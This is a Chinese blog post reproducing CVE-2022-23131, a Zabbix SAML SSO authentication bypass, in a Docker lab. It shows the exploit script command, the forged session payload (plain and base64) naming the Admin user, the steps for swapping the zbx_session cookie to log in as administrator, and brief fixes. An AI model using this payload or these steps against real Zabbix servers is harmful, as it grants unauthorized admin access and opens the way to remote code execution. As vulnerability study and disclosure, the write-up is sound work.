Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >zabbix最新漏洞,可绕过认证登陆!

zabbix最新漏洞,可绕过认证登陆!

原创
作者头像
运维朱工
修改于 2022-08-28 04:16:53
修改于 2022-08-28 04:16:53
1.2K0
举报
文章被收录于专栏:云计算教程云计算教程

漏洞概述

漏洞编号:CVE-2022-23131

漏洞威胁等级:高危

Zabbix是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。

Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE

影响范围

Zabbix Web前端版本包括

  • 5.4.0-5.4.8
  • 6.0.0alpha1

复现

虽然官方给是zabbix版本在5.4.0-5.4.8这个区间受影响,但是我在zabbix 5.4.11也同样复现了这个问题。

代码语言:shell
AI代码解释
复制
# 快速构建zabbix环境
]# docker run  --rm -d -P lutixiaya/zabbix-cve_2022_23131:latest
~]# docker ps
CONTAINER ID   IMAGE                                    COMMAND                  CREATED         STATUS         PORTS                                     NAMES
158e737a3794   lutixiaya/zabbix-cve_2022_23131:latest   "/bin/sh -c 'bash /r…"   3 seconds ago   Up 2 seconds   0.0.0.0:49153->80/tcp, :::49153->80/tcp   competent_diffie

可以看到启用了SAML认证方式,这时直接点击该认证是无法登陆的,但是通过修改cookie可以跳过认证。

image.png
image.png

修改cookie

代码语言:shell
AI代码解释
复制
~]#  python CVE-2022-23131.py http://ip:49153/   
未加密Payload:{"saml_data":{"username_attribute":"Admin"},"sessionid":"99c65fd664e1e0bb929d8a9d964f0a98","sign":"2cd21893210753d4d2926aa08fe7ebefdd41a8ab6413bb551ce048848b1dda44"}


加密后Payload:eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiOTljNjVmZDY2NGUxZTBiYjkyOWQ4YTlkOTY0ZjBhOTgiLCJzaWduIjoiMmNkMjE4OTMyMTA3NTNkNGQyOTI2YWEwOGZlN2ViZWZkZDQxYThhYjY0MTNiYjU1MWNlMDQ4ODQ4YjFkZGE0NCJ9
                                   

复制上面加密后Payload,修改zbx_session(在浏览器按F12,打开开发者工具)的值。

image.png
image.png

修改完成之后,再次点击SAML,可直接跳过认证登陆!

image.png
image.png
image.png
image.png

修复建议

临时方案:禁用 SAML 身份验证

推荐方案升级安全版本

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
实战CVE-2022-23131漏洞 | 身份认证绕过
Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。它与 Pandora FMS 和 Nagios 等解决方案非常相似。由于其受欢迎程度、功能和在大多数公司网络中的特权地位,Zabbix 是威胁参与者的高调目标。
网e渗透安全部
2022/06/15
1.8K0
实战CVE-2022-23131漏洞 | 身份认证绕过
CVE-2022-23131:Zabbix 前端身份验证绕过漏洞警报
美国网络安全和基础设施安全局 (CISA) 在其已知已利用漏洞目录中添加了两个新的 Zabbix 漏洞(CVE-2022-23131 和 CVE-2022-23134)。据报道,该漏洞会影响 Zabbix 基础设施监控工具。
Khan安全团队
2022/03/01
1.9K0
CVE-2022-23131:Zabbix SSO认证绕过漏洞
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。
Timeline Sec
2022/05/25
1.8K0
CVE-2022-23131:Zabbix SSO认证绕过漏洞
CVE-2022-23131_Zabbix登录绕过漏洞复现
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/03/11
2.8K0
CVE-2022-23131_Zabbix登录绕过漏洞复现
CVE-2021-27927: Zabbix-CSRF-to-RCE
Zabbix是企业IT网络和应用程序监视解决方案。在对其源代码进行例行检查时,我们在Zabbix UI的身份验证组件中发现了CSRF(跨站点请求伪造)漏洞。使用此漏洞,如果未经身份验证的攻击者可以说服Zabbix管理员遵循恶意链接,则该攻击者可以接管Zabbix管理员的帐户。即使使用默认的SameSite=Laxcookie保护,此漏洞也可在所有浏览器中利用。该漏洞已在Zabbix版本4.0.28rc1、5.0.8rc1、5.2.4rc1和5.4.0alpha1中修复。
黑伞安全
2021/04/08
1.9K0
CVE-2021-27927: Zabbix-CSRF-to-RCE
CVE-2024-22120|Zabbix Server SQL注入漏洞(POC)
Zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。
信安百科
2024/05/22
2.7K0
CVE-2024-22120|Zabbix Server SQL注入漏洞(POC)
CVE-2024-42327:Zabbix认证后SQL注入漏洞
Zabbix 是一款开源的网络监控和报警系统,用于监视网络设备、服务器和应用程序的性能和可用性。
Timeline Sec
2025/01/22
2600
CVE-2024-42327:Zabbix认证后SQL注入漏洞
一文看懂认证安全问题总结篇
研究认证相关的安全问题也有一段实践了,今天就对认证相关的安全问题做个总结。其中涉及到一些前置概念这里无法一一讲解,可以在相关RFC文档或者链接中深入阅读,笔者已经把相关资料整理收录在参考链接。本文更多的是对认证相关的安全问题做个总结。另外文中引用了一些网络中的图片,由于来源不一,所以就不逐个标明,在此一并感谢。
FB客服
2019/05/14
1.9K0
一文看懂认证安全问题总结篇
使用docker运行zabbix-server
3、启动zabbix-mysql容器使用link连接mysql与java-gateway。
码农编程进阶笔记
2021/07/20
2K0
使用docker运行zabbix-server
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现。代码分析这一块主要还是借鉴了大佬们的一些分析思想,这里对大佬们提供的思路表示衷心的感谢。
HACK学习
2021/07/21
7.7K0
基于Docker部署4.4版本的zabbix监控平台
提供两种不同的安装方式,两种方式都可以,自己根据实际情况选择,也可以跟我文档一样搭建两套,为了方便后期管理yml,个人建议使用3.2小节的安装方式,单机编排
没有故事的陈师傅
2020/04/10
2.7K1
基于Docker部署4.4版本的zabbix监控平台
【漏洞复现】Apache Shiro 反序列化漏洞
shiro漏洞已经曝光很久了,一直没有整理思路与详细步骤,最近在学习java的反序列化,复现该漏洞来方便之后的学习
李鹏华
2024/03/12
2K0
【漏洞复现】Apache Shiro 反序列化漏洞
搭建dedecms漏洞靶场练习环境
本文将对dedecms(织梦cms)所存在的漏洞进行分析和复现,因为代码审计较弱,代码这一块的分析借鉴了一些大佬们的思想,在这里对大佬们表示衷心的感谢。
HACK学习
2021/06/24
12.6K1
搭建dedecms漏洞靶场练习环境
Nexus Repository Manager 2.x 命令注入漏洞 (CVE-2019-5475) 两次绕过
2019年9月初我们应急了Nexus Repository Manager 2.x 命令注入漏洞(CVE-2019-5475),其大致的原因和复现步骤在 hackerone[1] 上公布了,在应急完这个漏洞之后,我们分析该漏洞的修复补丁,发现修复不完全,仍然可以绕过,本篇文章记录该漏洞的两次绕过。虽然早发布了两次的修复版本,由于官方第二次更新公告太慢https://support.sonatype.com/hc/en-us/articles/360033490774,所以现在才发。
Seebug漏洞平台
2020/07/03
1K0
Nexus Repository Manager 2.x 命令注入漏洞 (CVE-2019-5475) 两次绕过
Weblogic相关漏洞复现
假如目标环境有任意文件读取的漏洞,我们可以选择性地读取一些文件,由于weblogic使用AES加密(老版本3DES),所以是可以解密的,只需要找到加密时的用户密文和密钥即可,其均位于base_domain下,名为SerializedSystemIni.dat和config.xml,在本环境中为./security/SerializedSystemIni.dat和./config/config.xml(基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain)所以我们可以读取这两个文件
Gh0st1nTheShel
2022/02/25
2.9K0
Apache log4j2 远程命令执行漏洞复现
Apache log4j2 RCE漏洞(CVE-2021-44228)一出,各大行业知名厂商纷纷中招,与之前的fastjson、shiro漏洞相比更为严重,预计在之后的三四年中漏洞会一直存在。此漏洞影响范围特别广泛,漏洞利用门槛低,危害程度非常大,如果被攻击者恶意利用,危害程度不亚于2017年爆发的“永恒之蓝”漏洞。以下图片来源于网络
LuckySec
2022/11/02
5K0
Apache log4j2 远程命令执行漏洞复现
Grub2被曝登陆验证绕过0Day,影响众多Linux版本(CVE-2015-8370)
描述 近日,研究人员发现了一个Grub2的漏洞,版本1.98(2009年发布)到2.02(2015年发布)均受影响。本地用户能够通过这个漏洞绕过任何形式的认证(明文密码或者哈希密码),使得攻击者进而可
FB客服
2018/02/07
1.6K0
Grub2被曝登陆验证绕过0Day,影响众多Linux版本(CVE-2015-8370)
Web中间件常见安全漏洞总结
来源 | https://www.lxhsec.com/2019/03/04/middleware
Bypass
2020/02/26
17K0
2020护网期间公布漏洞总结-附部分漏洞Poc,Exp
4.Apache DolphinScheduler远程代码执行漏洞(CVE-2020-11974),危害级别:危急,官方已发布补丁
Gamma实验室
2020/12/23
6.6K0
2020护网期间公布漏洞总结-附部分漏洞Poc,Exp
红队——多层内网环境渗透测试(二)
本次多层网络域渗透项目旨在模拟红队攻击人员在授权情况下对目标进行渗透,从外网打点到内网横向穿透,最终获得整个内网权限的过程,包含Log4j2漏洞,MS17-010,CVE-2020-1472,CVE-2021-42287/CVE-2021-42278以及一些痕迹清理的思路等等。 文中若有不当之处,还望各位大佬多多点评。 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目
FB客服
2023/03/30
1.6K1
红队——多层内网环境渗透测试(二)
推荐阅读
相关推荐
实战CVE-2022-23131漏洞 | 身份认证绕过
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档